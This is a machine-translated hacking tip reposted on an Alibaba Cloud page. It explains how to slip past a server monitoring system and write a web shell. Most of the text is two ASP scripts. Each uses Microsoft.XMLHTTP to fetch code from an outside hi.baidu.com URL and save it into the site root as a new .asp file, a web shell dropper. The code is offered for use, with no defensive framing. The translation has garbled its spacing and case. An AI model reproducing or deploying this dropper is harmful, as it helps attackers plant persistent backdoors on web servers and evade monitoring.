Second Method to break through the first-class monitoring system to write shell

Source: Internet
Author: User

There are two methods to break through the first-class monitoring system to write shell (PS: I only know 2)

Another method is to bind images. The second method is introduced.

<%

Set xPost = CreateObject ("Microsoft. XMLHTTP ")

XPost. Open "GET", "http://hi.baidu.com/xahacker/1.txt", False // the address of the Code on the Internet, that is, Dama

XPost. Send ()

Set sGet = CreateObject ("ADODB. Stream ")

SGet. Mode = 3

SGet. Type = 1

SGet. Open ()

SGet. Write (xPost. responseBody)

SGet. SaveToFile Server. MapPath ("test. asp"), 2 // file generated in the root directory

Set sGet = nothing

Set sPOST = nothing

Response. Write ("the object has been downloaded! ")

%>

-------------------------------


------------------------------------------


<%
Set xPost = CreateObject ("Microsoft. XMLHTTP ")
XPost. Open "GET", "http://hi.baidu.com/xahacker/fuck.txt#,false
XPost. Send ()
Set sGet = CreateObject ("ADODB. Stream ")
SGet. Mode = 3
SGet. Type = 1
SGet. Open ()
SGet. Write (xPost. responseBody)
SGet. SaveToFile Server. MapPath ("fuck. asp"), 2
Set sGet = nothing
Set sPOST = nothing
%>

Source: street poet
 

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.